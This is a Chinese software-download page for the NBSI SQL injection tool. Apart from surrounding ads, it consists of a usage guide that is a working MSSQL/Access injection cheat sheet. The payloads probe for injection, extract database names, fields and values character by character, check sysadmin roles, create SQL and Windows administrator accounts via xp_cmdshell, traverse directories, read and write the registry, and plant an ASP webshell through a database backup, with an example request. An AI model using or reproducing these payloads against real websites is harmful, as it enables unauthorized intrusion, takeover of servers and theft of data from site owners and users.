列表格式显示

热搜: 360安全卫士  |   安全浏览器 |   恢复大师 |   杀毒 |   软件集合包 |   录屏  |   51游戏盒子  |   GoLink加速器 |   雷神网游加速器 |   Steam下载管家

10安全相关 - 分类
网络安全 - 时间排序 更多...
网络安全 - 点击排序 更多...
网络安全 - 大小排序 更多...
作者

/headphoto/1.jpg

admin

用户ID: 1

年龄: 33

性别:

地区:

人气: 5117

登录时间: 2024/10/7 23:49:25

简单介绍:

 

最近发布的软件 更多>>

首页 >> 10安全相关>> 网络安全>>nbsi网站漏洞检测工具 发布者:admin >> 本人发布的更多软件

nbsi网站漏洞检测工具 

     
软件厂家: 官方网站:
大小: 语言:
类型: 类别:
更新时间: 运行环境:
;开始下载地址

360精品软件下载

装机必备
办公必备
MAC系统
游戏娱乐
360安全卫士
大安全时代,提供全面安全服务 HTTP高速下载
360安全浏览器
全面守护上网安全,防病毒网站,防隐私泄露 HTTP高速下载
360压缩
永久免费、安全、高效 HTTP高速下载
360桌面助手
全面提升办公效率,工作更轻松 HTTP高速下载
360随心定制包
自选软件制作一键安装的“集合包” HTTP高速下载
集合包
官方推荐赚钱的软件包,打包到一起,一键安装 HTTP高速下载
360文件夹
高级轻巧文件管理器 HTTP高速下载
雷神网游加速器
一键加速Steam千款游戏,免费体验,随时暂停加速时间 HTTP高速下载
360杀毒
一键扫描,全面诊断,彻底杀毒,拦截广告 HTTP高速下载
启源恢复大师
简单易用,好评度高. HTTP高速下载
360安全卫士极速版
安全力十足,无广告弹窗 HTTP高速下载
360极速浏览器X 64位
极速浏览,极致顺滑 HTTP高速下载
软件标签: nbsi sql

nbsi 3.0纯净版 是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来绿色资源网下载!

nbsi 3.0纯净版简介

本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由vb语言编写的网站漏洞检测工具的名称,asp注入漏洞检测工具,特别在 sql server 注入检测方面有极高的准确率。

nbsi官方版使用说明

1.判断是否有注入

;and 1=1

;and 1=2

2.初步判断是否是mssql

;and user>0

3.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

4.注入参数是字符

“and [查询条件] and ““=“

5.搜索时没过滤参数的

“and [查询条件] and “%25“=“

6.猜数据库

;and (select count(*) from [数据库名])>0

7.猜字段

;and (select count(字段名) from 数据库名)>0

8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)

;and 1=(select is_srvrolemember(“sysadmin“));--

;and 1=(select is_srvrolemember(“serve radmin “));--

;and 1=(select is_srvrolemember(“setupadmin“));--

;and 1=(select is_srvrolemember(“securityadmin“));--

;and 1=(select is_srvrolemember(“diskadmin“));--

;and 1=(select is_srvrolemember(“bulkadmin“));--

;and 1=(select is_member(“db_owner“));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell “net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add“

;--

;exec master.dbo.xp_cmdshell “net user username

password /add“;--

;exec master.dbo.xp_cmdshell “net localgroup

administrators username /add“;--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree “c:\“

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not

in(“上步得到的paths“))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs “c:\“;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree “c:\“;-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell “type c:\web\index.asp“;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues “hkey_local_machine“,

“software\microsoft\windows\currentversion\run“ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread “hkey_local_machine“,

“software\microsoft\windows\currentversion“,

“commonfilesdir“ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种reg_sz 表示字符型,reg_dword 表示整型

;exec xp_regwrite “hkey_local_machine“,

“software\microsoft\windows\currentversion“,

“testvaluename“,“reg_sz“,“hello“ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue “hkey_local_machine“,

“software\microsoft\windows\currentversion“,

“testvaluename“ 删除某个值

xp_regdeletekey “hkey_local_machine“,

“software\microsoft\windows\currentversion\testk

ey“ 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (“<% dim oscript %>“);

backup database model to disk=“c:\l.asp“;

15.mssql内置函数

;and (select @@version)>0 获得windows的版本号

;and user_name()=“dbo“ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (“<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>“);

backup database model to disk=“g:\wwwtest\l.asp“;

请求的时候,像这样子用:

http://ip/l.asp?c=dir

解压密码:www.down80.com


本页Html网址:/htmlsoft/362321.html

本页aspx网址:/soft.aspx?id=362321&bianhao=20240111_233152_173558&kind1=10安全相关&kind2=网络安全

上一篇:Microsoft isa server 2006 64位系统客户端

下一篇:工艺品战斗机官方版

增加   


相关评论        新窗口打开查看评论